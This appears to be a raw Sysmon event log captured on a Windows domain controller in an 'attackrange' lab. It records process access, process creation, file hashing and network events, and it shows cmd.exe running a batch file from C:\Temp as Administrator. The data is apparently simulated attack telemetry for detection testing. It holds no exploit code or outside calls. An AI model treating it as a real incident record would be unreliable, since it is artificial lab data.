12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-659C-6064-4B01-00000000AE01}15325312C:\Windows\system32\conhost.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.428{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.413{266CAFBE-64C5-6064-A500-00000000AE01}43562996C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+18d25c|C:\Windows\System32\SHELL32.dll+18cfb3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.423{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" "C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.147{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D35842A88901C8730677FC62B81A8BB,SHA256=39BF712D7A9C334FC2D059FF5DE078A2E754DFC803523B0F9DE218A9815C44F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.256{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4B014FBD218B22C3772A92B3272981,SHA256=AA54E110C2AD86B53C50A79729D37D01D93A6C2B3D08B7F68D8AB19A3208E38D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53645-false10.0.1.12-8000- 354300x80000000000000009755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:49.212{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53644-false10.0.1.12-8089- 23542300x80000000000000009754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:50.272{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E613CC518755AC6750C21F9010366C,SHA256=6622ACF410579F1F55A7F0C92C8E925F77A12F8901E9FDC27BB9C1D257308EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:51.318{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13F57B449ED39EEBD2568CF96FE58A5,SHA256=7A89BABEBC96F36C9DBA4FB07163D4E52021F99E2C574F72B543F03817B32305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:52.349{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DC4635C7FC1015021DC40DE10AB724,SHA256=F4E4D85151D53DC4AF4DED51B0E5C2930FB9BE0AD7CDDF7C84D0951CBCEB1FA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:53.395{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4FE5A6CCA248D790063986A01CFD23,SHA256=EF64E9BD87B3897B56A2ACB865D6BE5324951435041CA364D1EF643843C81DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:54.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A66A7D299C780A2F163D2D0CC72E4EC,SHA256=0FB4713AF23E58C5E34B2DE55BB4CD9A9C26793CAE5FEC0190AF0E682D3FB4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.520{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF94A67A101A2030D69BBE5B938EBF2,SHA256=E18A2ACF7F5732D0FD77E8CFB537F048106BF0A66D82DC244B7F91FF2CD77D9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000009770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 